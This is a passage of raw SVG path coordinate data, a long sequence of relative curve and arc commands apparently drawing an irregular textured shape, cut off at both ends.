.7.7,2.4-5.3-.1-5.1.3-6.4.6,5.3.2,2.2-.5,6.6-.4-1.7,1,5.6,2.5,10.1,3.6-3.8,0-3.1-.3-5.9-.4-.7.4,5.6.4,6.2.7-5.7.4-13.7.9-4.1,1.7.1-.2-.9-.4,1-.4.2.3,7.9,1.3,1.4,1.6-2-.2-5.4-.2-6-.5,1.8,0,2.4-.2,2.4-.4-4.4,0-4-.4-7.4-.5-1.7.4,4.1.3,3.3.6-3.9-.1-3-.2-5.7-.1,3.3.2,4.4,1,7.7.8-6,.2,3.5,1.2-2.9,1.5-3.6-.2,3.3-.5-3.3-.6-.8.2-.5.6.8.9,6.3.2-1.3-.2,2.6-.2,6.2.1,5.4,1.2,9.2,1-6-.8-.1-1.5-5.7-1.8,3.7-.2,4.2-.6,9.1-.7.1.4.8.3,2.3,1-4.2,0-13.5.6-2,.8-1.5-.4.9-.5,3.8-.5-3.1.3,4.8.6.8.9,6.3.1.8-.9-1-1.1,1.8,0,2.1.2,4.4.2-3.6-1.5.8-2.2,5.5-3.3-7.3-.2-4,.6-10.6.5-.1-.1-1.3-.2-1.6-.3,4.5.1,4.5-.3,3.6-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.5-.6.8-1.1-3.9-1.3,2.9.1-3.7-.8.7-.7.9.1,4.7.5,5.8.2-4.4-.3-4.7-.8-5.3-1.3a53.22,53.22,0,0,0,6.8-.2c-2.5-.4-6.4.1-8.6-.3,5.5-.1.3-1,7.4-1.1-3.6,0-5.2-.2-4.6-.4,1.7.1,9.6.4,5.7.1-5.1,0-4.2-.9-.7-.8-.2.9,8.5.6,10.9,1.3a24.32,24.32,0,0,1-2.7,0c-2.8-.1-2.1-.3-5.9-.3-.3.5-3.8.4.8.9a45.4,45.4,0,0,1-6.9.1c-.2.4,7,.4,7.6.7.3.3-2.2.3-.8.6-1.4,0-2.8-.1-4.2-.1,3.2.6-.3.2,4.9.9-1.5.4-5.5.4-9.4.3,1.2.2,7.9.1,8.7.4.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c4.6.2,4.2-.1,7.1.2-4.9-1.3,3.4-2.1-2.9-3.2,1.6-.1,3.7-.1,7,0-1.5-.6-2.7-1.1-4.5-.4-.9-.2-2.3-.3-3.2-.5,6.2.1,6.6-.4,2.3-.5,5,.1-3.3-.4,1.1-.3,4.4-.1,3.8.6,6.5,1,3.9-.3-1.6-1.2-2.9-1.7,6.4.6-.6-.8,3.5-.8,2.4.1,3.5.8,6,.5-4.7-.5-2.6-1-9.7-1.5,9.2-.4-10.1-2.1,1.8-2.7-4.4-.3-2.6-.8-.9-1,3.2.1-.2.6,6.1.6-.8-.4-3-.7-6.3-.9.2-.2,3.6-.1,3.9-.3-2.6-.1-5.4-.7-3.3-.6,1.7.1,1.7.2,1.7.4a29.51,29.51,0,0,0,5.4-.2c-2.1-.1-5.2-.1-5.8-.2a76.33,76.33,0,0,0,12.9-1.1c-7.2-.2,2.2-.6-6.2-.7,0,.4,4.5,1.1-.9.5-3.2.2,2.6.7-.6.9-.9,0-1.9,0-2.9-.1-1.2-.6,6.9-.8,1.5-1.5-.1.1.5.3-1.1.3-.1-.1-1.3-.2-1.6-.3.4-.2,5.4,0,3.9-.3-7.6.2-.1-1.1-10.9-1.3,5.1-.1-1.1-.2-.6-.7a24.32,24.32,0,0,1,2.7,0c2.6.1,5.3.7,7.3.4-3.5-.1,0-.7-4.8-.8,1.2.2-2.4.4-2.6.2-1.8-.5,8.2-.3,2.1-.8a8.77,8.77,0,0,1-2.8,0c4.1-.4.9-.9,1.6-1.4,2.1.3,2.2.8,6.5,1-1.4-.5.1-.7,3.5-.8-5.1-.2-7,.1-8.6-.3,4.2.1,1.1-.6,5.1-.5-4.8.1-7.6-.5-8.6-.3,5.3.4-3.5,0-2.6.2,2.3,0,2.8.7.5.6.4-.3-3.5-.9-4.7-.7,3.5.1.6.4-1.1.3-3.3-.3.4-.3-.6-.7-2.7-.2-4.5.2-5.7-.1.6-.6,4.6-1,1.1-1.9,3.8.5,5.1-.5,8.3,0-2,.2-3.5.8,2.4,1.1-2-.6-3.2-1.6,1.2-1.8,2.1.7,1,.8-1.7,1.3,7.7.1,9.3.4,17.3.7.8-.3-4.6-.9-4.9-.8-1.6.2,5.9.5,1.8.5a36,36,0,0,1-7.6-.7c4.5-.1.6-.4,2.1-.8,5.7.3,2.7-.2,5.4-.2,2.8.3.4.3.5.6,8.8.1-.3-.4-.7-.8,2.5,0,4.4.1,5.8.2a9.4,9.4,0,0,0-3.2-.5c-1.5.5-12.5-.4-10.5-.9a54.5,54.5,0,0,1,7,0c.1-.2-1.8-.3-1.8-.5,5.1.1,3.5-.4,8.1-.3-2-.5-.4-.5-4.8-.8-4.1,0-.1.4-2.5.4-2.2-.1-5.6-.7-2-.7,4.6.1,7.7.5,8.3,0-7.3.1-1.1-.2-4.5-.4a87.83,87.83,0,0,1-9.6.1c-1.1-.7,1.9-.8,1.7-1.2,1.8.3,1.6.8,5,1,4.9-.4-3.4-1.4,2.8-1.6-3.5.4,3.8.5,6.3.9,1.7-.2,4.5.3,5.6,0a41.63,41.63,0,0,1-6-.5c4.4,0,6-.5,9.5-.2-2.3-.6-8.7-1.4-.2-1.8,1.5.2-3.9.3.4.4a3.3,3.3,0,0,1,1.4,0c.8.3-6.5-.2-4,.2,7.2.3,6.1,1.1,9.8,1.6-3.9-.2-2.6.2-4,.2,3.4-.1,3.9.6,5.8.2-5.3-.3,2.2-.3.9-.5-6.7-.3,1.5-.7-3.9-1.3,2.1.1,5.2.1,5.8.2-.4.1-3.1.3.4.4.2-.3,1.9-.4.7-.7-2.5,0-3.4-.2-3.1-.4a42.45,42.45,0,0,1-7.3-.4c4.4,0,6,.4,7,0-6.1-.3-10.4-.7-14.8-1.1a37.36,37.36,0,0,0,5.5-.1,4,4,0,0,0,1.6.3c-1.9-.6,4.9.3,5.5-.1-9.7-.4-2.6-.4-9.2-1,4.7.2,3,.2,5.6,0,.7.6.3.1,4.3.2.1.1,1.3.2,1.6.3-4.1-.3-3.5.4-1,.4a83,83,0,0,1,8.5.2,36.57,36.57,0,0,0-8-1.2c.8-.5,1.5-.9,7.8-.6.5.3-2.9.2-3.9.3,3.9.5,5.4,1,8.2,1.4-2.5-.4,5.9-.2,5.6,0-1.6.3-5.8.7-.7.7-7.8,0-4,.8-10.4.7-.3.4,3.9.5,6.2.7-3.6-.1-1.9.4-3.8.5a38.81,38.81,0,0,0-6.9.1c4.4.1-2,.7,1.8.5.6-.1,1.3-.2,2.5-.3-.4.3,2.4.5,3.4.7,4.8.2,1.8-.4,8.2-.1-.6.2-.3.4-2.4.5-1.1-.3-2.5.2-5.5.1,2.2.5.4.5,1,1.1,7.5.2.4-.5,2-.9,10.8.2,9-.7,17.4-.7-1.7-.4-6.7-.5-2-.7-2.3-.1-4.7-.1-7.1-.2-.4.3,4.6.3,3.4.7a17.57,17.57,0,0,1-3.9.4,30,30,0,0,1-3.6-1c4.5.1,1.7-.4,4.3-.4-8.9,0-4.1.8-12.1,1,1.8-.5,2.6-1.3,12.5-1.6-.5-.2-2.3,0-2.9-.2,1.4,0,1.6-.2-.2-.2.9.2-3.3.5-4,.2,1.8-.2,1.7-.7,4.9-.8,2.9.1,1.7.4,4.6.5.6-.1,1.8-.2,2.5-.4-2.8-.1-9.4-.5-4.8-.7,2.7.7,2.1-1,9.3-.4-.8-.3-4.8-.4-3.5-.8,6.2.4,2.4-.1,5.4-.2,3.2,1.3,6.6,3.1-2.7,3.2,1.8.7,1,1,2.7,1.5,1.9,0,3.2.1,4.3.2-.5-.4,6-.1,6.6-.4-4.1,0-6.9,0-8.5-.2.9-.3-4.8-.7-.7-.8,1.7.2,1.9.4,2,.7,5.3,0,11.5-.5,7.4-1,.1.3.2.6-3.8.5.7-1.4-7.4-3.4,9.8-3.1-5.5-.3,7.8-.3.7-.7-1.4.1-.1.4-4,.2-1.1-.5-.4.1-4.3-.1a5,5,0,0,1-.6-.7c-6.1-.2-4.2.4-9.4.3,3.8-.7,20.4-1.5,5.1-2.1,0-.1-.1-.1-.2-.2,3.4-.1,6.2.5,7.1.2-2.2-.1-4.6-.3-4.6-.5,6.3.2-1.7-.6,2.1-.7,6.8.6,6.8,1.5,6.1,2.2,1.6.1,2.3.2,3,.3,5.8.3,7-.3,9.8.1-2.6.2-2.7,0,.3.3-3.9,0-5.2.3-4.9.8,7.7.2-.3-.4,3.8-.5,8,1.3-1.1,1.5,2.4,2.7,6.5.3,3.7.7,10.4.8-5.3,0-8.5.3-11.3-.3-1,.3,4.5.9,6.2.7-1.2-.2,3.8.3,3.9-.2a21,21,0,0,1,4.8.8c-2.5.1-2.6-.1-7.1-.2-.4.4-.5.3.7.8,1.9.3,5.1-.1,7.2.3a40.53,40.53,0,0,0-6.4.6c9.2.7,4.1,1.5,4.8,2.3-3.3-.1-9.6,0-5.3.2,1.8-.1,4.6-.2,8.2-.1-2.1.3-4.3.4-.6.9-7.5-.2.5.6-5,.7,2.1.1,7.2,0,7.2.3l.2.2c-5.1-.1-7-.4-11.5-.5-1.7.4,6.4.2,4.6.5,4.1.2,3.5-.1,7,0-1,.5,4.6,1.1-1.5,1.5,5.6.2,3,.5,4.8.8-.9.2-7-.2-5.4.2,2.7,0,3.2.2,5.8.2.1-.1.2-.3,2.7-.2,10.2.6,3.7,1.5,3.2,2-.1.1,7.4,1.2-2.3.6,1.7.3,2.9.8-3.7.6.6-.2,3.2-.2,2.3-.6-4.2-.1-5.1-.4-8.8-.5,1.5.5-4-.3-2.5.3.8.4,7-.1,8.6.3a17.63,17.63,0,0,1-3.9.4c-1.46-.17-2.93-.27-4.4-.3-.6.2-3.2.7-.6.9,2.4,0-.6-.5,2.3-.5,2.7,0,11.7.5,2.9.2-.1.4,8.2.3,6.3.8-2.4,0-3.8-.2-4.3-.1.2.4,3.7,0,6,.5a51.1,51.1,0,0,1-5.4.2c4.4.5-2.2,1.3,6.4.9a3.92,3.92,0,0,1-2.3.5c-1.5-.4-2.2-.2-5.8-.2,1.4.6-.8.9-1.6,1.4,3.3.2,5.1-.2,5.7.1-3.6-.1,2.1.2.4.4-2.1,0-5.3-.2-5.6,0,.5.5,3.4,1.1-1.9,1-.9-.2,1.2-.5-1.9-.6-3.9.3,4.3.8,1,1.1,1.9,0,3.8.1,5.7.1,0,.4,5.7,1-3.5.8,2.7-.4-5.2-1-10.5-.9.1.3,1.4.7-.6.9,2.1.3,4.1-.1,5.8.2-2.1.3,6.3,1.5,3.1,1.9,2.8,0,.7-.5,5.2-.4,5.3.9-3.4,1.6-.9,2.2a37.63,37.63,0,0,1,3.8-.5c2.3.6-2,.9-1.3,1.7.1.1,2.6.2,3,.3-.1.5-7,.9-11.7.9,9.5.3,8.4-.3,12.1-.5,3.8.6-3.6.6,1.1,1.2,2.2,0-.8-.6,3.9-.3-3-1-7.2-2,.6-2.5-2.3.7,1.1.3,4.8.8-.2.3-5.2.7-3.4.9a11.09,11.09,0,0,1,2.7,0c3.5.4-2.9.9.8.9-.2-.2.8-.3,2.5-.3,3.9,1.1-2.2,1.4,4.7,2.2-9.4-.1,2.3,1.7-6.9,1.6-1-1.1.2-1.6-2.1-2.4-3.4.1-2.8-.4-4.7-.7-6.5.4,2.1,1.5,4.6,2.1-1.8,0-1.8.1-4.1,0,.6-.4-2.9-.5-2.2-.9-2.4,0-7.6-.2-6.8.2,2.7.1,3-.1,5.6,0a7.57,7.57,0,0,0,.8.9c-9.5,0-9.1-.2-18.5-.5,0-.1,1.7-.1,1.1-.3-10.1-.2-11.8-.9-16.5-1.4-3.8.3,5.7.5,3.7,1.1a21.29,21.29,0,0,0-4.3-.1c4.4,0,1,.6,6.1.6-.4-.3.3-.4,2.3-.5.2.1,2.6.2,3,.3,1.5.4-1.9.3-2.4.5,1.1.1,2.8.1,2.9.2,5.7.2-1.9-.4,5.4-.2,9.1.7,19.7.5,16.6,1.5-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.8,1-2.8,1.5-3,2.9,3.4.2,5.1-.2,5.7.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7-.4.3-4.2.2-6.7.3,2,.2,5.3.2,7.3.4.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a44.62,44.62,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2A60.14,60.14,0,0,1,434,68.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.52,31.52,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0h0c3.1,1.1,11.5,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4h-1.3c-4.1-.1-5.1-.3-4.9-.7a17.46,17.46,0,0,0,5-.3c1.4-.4,1.6-.8,8.3-.4-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-5.5-.6-3.8-2-7.2-3a23.68,23.68,0,0,0-2.9-.6h3a16,16,0,0,0,2.5-.1,15,15,0,0,1-2.4-.2c-1.6-.2-2.7-.3-5.1-.4,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.91,97.91,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.8-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.15,66.15,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7q1.65.3,4.2.6c1,.1,2.1.2,3.5.3,5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1a24.24,24.24,0,0,1-3.2.3c-2.1.1-3.8.2-1.6.6-.9-.2.2-.2,1.5-.1,1.1.1,2.4.2,2.8.2a5.67,5.67,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.52,31.52,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a27.09,27.09,0,0,1-3.1-.3,17.94,17.94,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.09,41.09,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.06,9.06,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.82,31.82,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a4,4,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.81.2,1.91.3.41.4,11.19.3.19-1.1,0-1.6s10.4,0,9.09-.7a35.68,35.68,0,0,0-4,.1c-2.19-.5-5.59-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.19-.3-6.19-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.59,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-3.7-1.5,5.5-1.6-7.2-1.3-3.3-3.2,2.1-3.9a14.11,14.11,0,0,0,2.9.2c-.4-.3-1.3-.5-3.4-.7-.1.1-.2.3-2.6.2-.7-.8,1.2-.9.1-1.4,2.1.1,3.7.2,5.9.4-2.5-.7,4.1-.6,1.6-1.3-3.9,0-3.7.3-7.1-.2a27.6,27.6,0,0,0,5.3-.3c-2.3-.3-5.8.1-7.3-.4.4-.7-1.2-.7-2.7-1.5,5.6.2,4.7-.5,9.6-.1.3-.7,3.6-.7-2.5-1.3,4.4.3,5.4-.1,10,.3.1-.2-1.8-.3-1.8-.5-3.1,0-7.5.1-8.6-.3,2-1.1,6.3-2.5-1.7-3.5,2.5,0,4.4.1,5.8.2-.2-.2-.3-.4-.5-.6-3.6,0-5.2-.2-4.6-.4,6.1.4,2.5-.2,8.31,0,4.09.6-1.5.9-2.91,1.5,7.9.4,6.31,1.6,2.5,1.9,7.9-.3,6.81-1.8,4-2.4,3.2-.6,7.5-1.1,8.1-1.9a20,20,0,0,1-4.5-.4c-4.4-.2-4,.1-8.4-.1-1.7.4,4.1.3,3.3.6-6.9-.3-3.09.4-9.59.1.8-.5,6.4-1.1-1.31-1.4-.19-.2-.3-.4-.5-.6,1.9.2,5.31.2,7.31.4.19-.6-7.5-.1-7.6-.7,2.3-.2,5.69-.1,1-.4,4.5-.2,7.8.4,9.9.2-2.4-.1-3-.8-.7-.8a28.18,28.18,0,0,1,5.8.3c-7.3-.3,1.2.7.9,1-2,.1-5.7,0-6.8.2,6.9.2,1.1.6.7.8,9.1.1,6.7-.6,7.6-.8,4.4.1,1.3.4,6.19.7-1.59-.5-5.9-1,.41-1.1-3.7-.1.69-.7-6.2-.7-1.7.3,4.4.7.6.7-6.7-.6.3-.7,1.8-1-4.7-.2-.8.3-5.5.1-.1-.1-1.3-.2-1.6-.3-.9-.6,2.2-.6,6.1-1-1.1-.3-2.1.1-4.2,0-.1-.2-.9-.3-1.7-.4a29.51,29.51,0,0,1,5.4-.2c3.7.1,1.5.5,6,.5-1.5-.5-2-.6.6-.9-1.5-.3-6.2-.3-6.1-.7.2-.2,3.6-.1,3.8-.3-2.2-.2-4.4-.9-1.2-1.3-2.9-.2-4-.5-6.2-.7-1,.5,2.5.8-2,.9-.8-.1-1.7-.3-3.1-.4,0,.3,2.5.4,3.3.6-8.8-.3-.5.7-3.6.7-1.9-.1-2.8-.2-5.8-.2,4.2.7,6.8,1.7-1.1,1.9,8.3.1,2.8,1.2-3.7.6.5.6,4.2.3,6.2.7-2.6,0-3.3.2-6.9.1-8.2-1.2-2.7-1.7,3.4-2.4-4.5-.8-1.7-1-4.1-1.5,1.4,0,2.8.1,4.3.1-3.9-.2-2.3-1.3-6.5-1,3.7.3,1.7,1-1.9.9-1.6-.7,1.5-1-.1-1.7a29,29,0,0,0,6.9-.1c-8.3-.2-6.2-.8-1.9-.6-1.9-1,3.8-1.9-1.4-3.2,5.4-.1,5.3-.7,1.7-1.2a41.25,41.25,0,0,1,4.3.2c-1.9-.5,1.1-.5,3.7-.6-4.2-.5-4.8.3-7,0a13.65,13.65,0,0,1,5-.7c-.1-.8-5.1-2.5.1-3.1-5-.8-7.6-4.5,1.6-2.9.7-.7-2-1.7-2-2.2,1,.6.7-.2,5.7.1-1.5-.4-2.1-.4.9-.5-6.7-.2,1.7-.7-3.7-1.1.1.1-1,.1-1.4,0h8.3c3.9.4,1.1.4,3.5.8,4.8-.1,4.7.2,8.7.4-3.4-1.5-1.3-1.2.7-2.4-5.2-.2-1.3.5-5.2.4-.2-.2-.3-.4-.5-.6-2.6,0-4.7,0-5.5.1,5.2.1-.6.3,4.6.5-1.1.1-.7.4-5.4.2-.5-.2.9-.5-3.2-.5,1.3.3,2.5.6-.8.6-5.4-.7.6-2-5.4-3,4.6-.2,5.6-2.2-2-2.3,3.1-.2,2.2-.1,6.8-.2,1.8.4-2.1,1.1,3.9,1.3-1.4-.5-3.7-1.3,3.6-.7,0-.3-4.5-.4-4.7-.7,1.9,0,3.8.1,5.7.1.1.2.2,1.1,3.4.7-4.1-.3-.4-.7.6-.9-3-.3-4.9-1.5,2.9-1.5,1.6.1,2.3.2,3,.3-.1.4-3.7.8.9,1a58,58,0,0,1-7.1-.2c-.1.5,4.3.2,6,.5-2.8.1-5.6.2-.9.5,4.3-.2,7.2-2,1.7-2.8,5.5-.3-5.2-1.9,9.6-1.7-1.6-.3-1.3-.9,3.4-.9.7-.3-4.1-.3-3.3-.6,2.6-.6,8.2-.3,16.3-.4-7.9-.2-7.2-1-3.9-1.3a21.78,21.78,0,0,1,3,.3c4.5-.3-7.8-.8-.8-.9,4.4-.1,2.5.7,4.4.3-3.6-.5,4.1-.4-2.1-.8.7-.2,4.1-.1,5.4-.2-5.9-.4-6.3-2.4,3.9-1.9-6.5-2.2,6.1-4.8,5.3-6.6,2.7.1,6.1.2,6,.5-1.9,0-6.3,0-1,.4-.4-.2,1.2-.2,4-.1,2,.4-3.7.6.8.9.3-.3,1.7-1,1.7-1.3-1.5-.1-6.6-.2-8.8-.5,10.4.4.7-.4,5.1-.5,2.3.4,8.5.3,5.6,0,.1.3-4.7-.1-4.4-.2,1.2-.4,14.8-.2,9.1-.7-3.4-.1,1.2.5-4,.2-5.8-.3.3-.7.5-1-8.6-.4-11.4-1-9.7-1.5.7.5,2.7.3,7.3.4-.1-.7-2.1-1.2,2.7-1.7.5.2,0,1.1,2.1.8-2.1-.6,3.6-.5,6.8-.2-3.1-.6,2.5-.5-2.3-1,1.8,0,1.8-.1,4.2,0s3.4.3,3.2.5c5.9-.2,6.5-.3,10.6-.6-3.7-.2-4,.3-5.6,0,1.2-.4-3.4-.5-3.5-.8,6.7.2,3.8-.5,6.4-.6,6.4.6-4.8.8,2.5,1.3-.3-.3,1.6-.6,6.6-.4,1.1.3-1.1.8,2.19.9,2.2-.5-.69-1,8.9-.9-6.3-.3-.4-.9-5.4-1.4,2.7-.1,2.81.1,5.6,0-2.69-.4,4.8-.3.9-.5.1.3-4.69-.1-4.4-.2,3.6.1,2.5-.3,2.31-.6,4.4.2,4-.1,8.4.1-5.1-1.2,5.4-1.7,3.09-2.8,2,0,7.4.3,7,0-4.3-.3-5.8-.7-3.59-1a21.48,21.48,0,0,1,3,.3c2.91-.4-1.4-2.1,8.6-1.3-4.5-.5-8-1.6.2-1.3-1.3-.4-6.5-.2-7.3-.4,11.4-.8,2.1-2.3,8.8-3.2,6.2,1,4.4.1,5.3-.1-1.7-.3-2.3-.6-3.6-.9,0-.1-.4-.2-1.8-.4-.3-.1-.7-.1-1.1-.2.2,0,.4.1.6.1-.4,0-.7-.1-1.2-.1a31.52,31.52,0,0,1,4-.2l1.2.3a1.25,1.25,0,0,1-.6-.1c0,.3.1.6,2.4,1-.19-.2-.1-.2.1-.3a3.88,3.88,0,0,1,1.6,1,4.91,4.91,0,0,1-.5-.1c.2,0,.3.1.5.1a.79.79,0,0,1,.2.7h0c0,.1-.1.3-.1.4a5.54,5.54,0,0,0-1-.2c-3.2-.2.1.8-2.5.8a24.16,24.16,0,0,1,4.3.9c-3.1-.5-4-.2-1.8.4-2.1-.1-3.4-.7-5.2-.8,2.8.5,2.5,1.1,3.5,1.2,0-.1.2-.2,2,.1,2.1.5-.7.2.3.7,3.91.7,1.6-.2,3.91.1-.81.5,3.19.6,3.19.6,4.1,1-1.4.4-3.9,0,4.1.6,7.5,1.6,8.3,1.3-4.4-.9,1.7-.1-2.5-1.2a21.08,21.08,0,0,0,4.1.5c-2.2-.6-4.4-.5-5.4-1.1,1.4-.7,10.6,1.5,9.7